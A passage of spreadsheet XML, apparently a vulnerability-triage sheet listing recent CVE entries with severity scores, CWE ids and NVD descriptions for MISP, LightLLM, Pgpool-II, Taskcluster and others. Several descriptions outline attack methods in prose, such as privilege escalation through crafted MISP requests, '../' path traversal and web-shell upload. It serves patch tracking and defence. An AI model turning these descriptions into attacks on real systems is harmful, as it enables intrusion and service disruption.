- The MISP.delegation server setting must be enabled
Impact:
- Confidentiality: read access to any event on the instance
- Integrity: overwriting existing delegation records and transferring event ownership
Affected versions: MISP &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103235</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103270</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 mounts reinforcement learning control routes on the public HTTP API without authentication checks. Unauthenticated attackers can call endpoints like /pause_generation, /abort_request, /flush_cache, and /init_weights_update_group to disrupt inference operations and wedge workers on deployments started with --enable_rl.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103270</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103471</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 buffers HTTP request headers without enforcing a maximum size limit, allowing remote unauthenticated attackers to exhaust server memory. Attackers can open TCP connections and stream bytes indefinitely without sending the header delimiter, forcing the server to allocate unbounded heap memory until the process is killed.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103471</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10764</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>4237bc98-ed97-4aeb-8e67-37a47a9e179d</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in BVMS 4.5 up to 12.3 including allows man-in-the-middle attackers to gain unauthorized access to sensitive data.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10764</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47097</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains an information disclosure vulnerability that allows unauthenticated attackers to decrypt sensitive diagnostics bundles by exploiting a static AES passphrase embedded in obfuscated form within the firmware. Attackers can reverse engineer the publicly available firmware image to recover the shared passphrase and decrypt diagnostics export bundles retrieved from the unauthenticated diagnostics endpoint on any affected device, exposing highly sensitive server information.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47097</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55094</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-306, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Taskcluster is the task execution framework that supports Mozilla's continuous integration and release processes. Prior to version 100.3.0, Taskcluster is vulnerable to unauthenticated RCE on Taskcluster deployments with an anonymous role that exposes the GraphQL endpoint and parses filter arguments using the sift library. This issue has been patched in version 100.3.0.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55094</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55224</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>MineAdmin is a ready-to-use backend management system suitable for quickly building website backends, operation platforms, permission centers, internal management systems, CMS, CRM, OA, ERP and other business applications. Prior to version 3.2.0-alpha.2, the app-store plugin service concatenates unsanitized user-supplied identifier values directly into file system paths. An attacker can use path traversal sequences (e.g., ../) to read, install, or uninstall plugins from arbitrary directories, and potentially execute arbitrary composer commands. This issue has been patched in version 3.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55224</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76992</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The CODESYS Gateway Client allocates memory based on a size field in a gateway response without enforcing an appropriate upper limit. An unauthenticated remote attacker controlling a malicious gateway can exploit this behavior to trigger excessive memory consumption, resulting in a denial-of-service condition thus leading to a total loss of availablity.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76992</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82826</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to the Cleartext Transmission of Sensitive Information which allows an attacker to eavesdrop on with authentication credentials and sensitive data in transit.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82826</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82828</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains an Incorrect Authorization vulnerability that allows an unprivileged user to perform administrator-level operations.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82828</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92867</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II , which may allow an authenticated attacker to cause abnormal process termination or arbitrary code execution.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92867</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92870</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92870</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92871</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal termination of the watchdog process.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92871</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102121</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>A form-rendering interface in the Advanced Forms component is reachable without authentication so that published forms can be displayed to anonymous visitors, but it returned more data than the form itself required. Anyone who knew the web address of a published form could potentially retrieve the form owner's Kiteworks account profile, including personal details, along with parts of the deployment's configuration settings; no passwords, authentication tokens, or multi-factor secrets were exposed.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102121</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102454</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Upload vulnerability. Privileged remote attackers can upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102454</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103239</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-862</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>MISP contains a privilege escalation vulnerability in the tag collection creation and editing functionality. The affected actions accepted the full HTTP request payload and passed it to a bulk-association save operation, which writes not only the intended tag collection record but also any associated model data present in the payload.
A user holding the tag editor permission could craft a request that includes additional model data (such as User or Organisation records) alongside the tag collection fields. Because the save operation processed all associated models indiscriminately, the injected sibling records were written to the database, enabling the attacker to modify or create privileged accounts and escalate to site administrator.
Preconditions:
- An authenticated account with the tag editor permission (perm_tag_editor)
- Network access to the MISP instance
Impact:
- Unauthorized creation or modification of User and Organisation records
- Privilege escalation from tag editor to site administrator
Affected versions: &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103239</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103398</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>OpenSave through 2.4.0 fails to properly validate save paths supplied by paired peers in the manifest request handler. Attackers can specify arbitrary directories outside configured save locations to read and write files through manifest and sync routes.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103398</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
